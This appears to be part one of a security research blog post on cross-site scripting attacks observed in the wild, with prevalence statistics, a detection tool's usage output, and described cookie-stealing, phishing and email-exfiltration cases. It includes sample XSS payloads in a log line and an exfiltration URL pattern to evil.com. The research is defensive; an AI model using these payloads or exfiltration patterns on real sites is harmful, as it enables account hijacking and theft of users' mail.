For those of you who were not able to make it to our talk at Blackhat USA, this blog post provides an overview of the information presented. This was a joint presentation by Trustwave SpiderLabs Research Team and Microsoft's Security Research and Defense Team.
This is part 1 of a 2 part blog post. In this installment, we will discuss example XSS attacks captured in the wild and also some statistics. In part 2, we will discuss XSS Defense Techniques.
XSS: Vulnerability Prevalence
OWASP Top 10 2013
As you can see from this graphic, the PREVALENCE of XSS across all applications tested is VERY WIDESPREAD.
Trustwave Global Security Report
In the latest Trustwave Global Security Report, the SpiderLabs App-Pentest Team generated the following list of top vulnerabiities identified in the last year during their engagements:
XSS: Attack Liklihood
The previous section provided metrics to support the theory that we already know - XSS vulnerabilities are rampant. What we wanted to focus on for our research was this - HOW are XSS vulnerabilities being exploited in the wild?
XSS Attack Data Sources
In order to find real-world attack data, we analyzed a variety of resources:
- Web server/proxy logs
- Web application firewall logs
- URL shortening services
- Spam e-mails
- Chat rooms, IRC traffic
- Comments on pages
- URL reputation services
All of this data together yielded approximately:
- 100s TB of raw data
- 10s TB of URLs
XSS Attack Data Analysis
So, how did we analyze this data for XSS attacks? Greg created a toolset called detectXSSlib:
- General purpose library written in C
- Based on a subset of OWASP CRS rules (IE XSS Filters)
- Optimized for performance
- Rules selected on the base of empirical data
- Command line tool provided (xssscan)
- Easy to integrate with other components
- nginx module PoC provided
# ./xssscan xssscan ver 1.0 (c) 2013 Greg Wroblewski Command line tool for detection of XSS attacks in URLs. Based on ModSecurity rules from OWASP CRS. Optimized for performance and large scale data mining. Usage: xssscan [-t] [-r] [-x] <URL> xssscan [-a] [-d] [-r] [-x] -f <TEXT_FILE_WITH_URLS> Options: -a - in output replace host names with www.example.com -d - deduplicate URLs by same host name -r - show rule number for detected XSS (for statistics or debugging) -t - show tokens of parsed URL (useful for debugging only) -x - list only URLs where XSS was not detected (default: was detected) # ./xssscan -f /var/log/apache2/access.log 172.16.209.1 - - [24/Jul/2013:10:40:40 -0400] "GET /wordpress/?s=%3Cscript%3Eprompt%28%22TEST%22%29%3B%3C%2Fscript%3E HTTP/1.1" 200 2155 "http://172.16.209.131/wordpress/?s=%3Cimg+src%3D1+onerror%3Dalert%28%27XSS%27%29%3E" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0"
Sanitized Example Attack Data
XSS Attack Examples: Proof-of-Concept Testing
- Scanning tools
- Scanning tools
- Going after bug bounty
- Internal testing
XSS Attack Examples: Defacements
Website defacements were another popular outcome for using XSS attacks. Here is an example attack payload:
XSS Attack Examples: Cookie Stealing
This is the first XSS attack category that directly negatively impacts web application users. Here is an example attack payload:
In line #1 - the attacker sends the XSS payload in a parameter that overrides the Referer data echoed back in the response to execute JS code. This code would instruct the browser to download the wwgw8k5srago.js file. This file contains the data in ine #2 which instructs the browser to make a request to the nwwgw8k5sra.gif URL and to pass the document.cookie DOM data as a parameter. If this attack is successful, the attacker can quickly use the application SessionID cookie value to log into the application at the victim user.
XSS Attack Examples: In-Session Phishing
***This example uses an XSS vulnerability in Hotmail that has since been fixed.***
If attackers can identify XSS vulnerabilities within web-based email providers, then they can send targeted Phishing emails to users. Take a look at the example exploit code:
In this instance, if I was logged into Hotmail and received the Phishing email, the JS code would trigger the onerror event call and issue a jQuery call to the attacker site which would present me with the following fake login page:
If the victim fall for this attack, their credentials will be sent to the attacker's site. We have seen at least 10 different instances of this type of attack, usually launched on e-mail providers and financial institutions, very often carefully prepared with localized login screens, well concealed password delivery servers, etc.
XSS Attack Examples: Data Exfiltration
In one case of the attack, the script we have seen had 10s of kB of code, and even included interesting left-over comments. How nice.
The script was able to enumerate through multiple pages of e-mail boxes, extract e-mail data, including attachments, and also steal contact list. Script was able to:
- Enumerate through last 60 pages worth of e-mail
- Extract the From, Subject, and Body of the e-mail by using the same calls as would be triggered if user were to view the e-mails
- Inject new script elements with source set to the URL containing the next chunk of the data read from the file.
- Send data in chunks to http://evil.com/hotmail_xss.php?u=<email>&msg= <subject+from>^^<segment index>^^<next segment of message body>
- Fetch content off of inbox/sent/drafts.
- Clean up : mark messages that were not originally read as unread
The upload process was also not trivial, leveraging data chunking.
# of Successful XSS Attacks per TLD
We have seen at least one sample of working attack for almost every single TLD out there.
Successful XSS Attacks Over Time
The intensity of attacks remained on the constant level over the time we were able to monitor them consistently.
Prevalence of XSS Attacks (based on Alexa Top N list)
Well over 6% of top 1,000 websites had a successful XSS attack.
Part 1 Conclusion
As we have outlined in Part 1 of this blog post, XSS attacks are real. They range in severity and impact depending on what your business model is and who your customers are however outcomes such as account hijacking and data exfiltration are serious issues.
How do we protect against XSS attacks? Stay tuned for Part 2 where I will provide an overview of tactical XSS defenses which can be used in production to help mitigate exposures.